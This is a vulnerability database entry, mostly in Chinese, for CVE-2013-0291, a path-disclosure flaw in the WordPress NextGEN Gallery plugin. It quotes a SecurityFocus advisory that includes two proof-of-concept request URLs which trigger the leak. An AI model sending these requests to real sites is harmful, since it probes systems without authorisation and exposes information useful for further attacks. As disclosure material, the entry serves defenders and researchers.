https://www.exploit-db.com/exploits/38314
https://www.securityfocus.com/bid/57957
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201302-398
WordPress NextGEN Gallery插件路径泄露漏洞






漏洞ID | 1121536 | 漏洞类型 | 信息泄露 |
发布时间 | 2013-02-14 | 更新时间 | 2013-02-15 |
![]() |
CVE-2013-0291 | ![]() |
CNNVD-201302-398 |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress中的NextGENGallery插件中存在路径泄露漏洞。攻击者利用该漏洞获得敏感信息有助于进一步攻击。NextGENGallery1.9.10和1.9.11版本中存在漏洞,其他版本也可能受到影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/57957/info
The NextGEN Gallery plugin for WordPress is prone to a path-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
NextGEN Gallery versions 1.9.10 and 1.9.11 are vulnerable; other versions may also be affected.
http://www.example.com/?callback=json&api_key=true&format=json&method=gallery&id=1
http://www.example.com/?callback=json&api_key=true&format=xml&method=recent&limit=1
|参考资料
来源:BID
名称:57957
链接:http://www.securityfocus.com/bid/57957
检索漏洞
开始时间
结束时间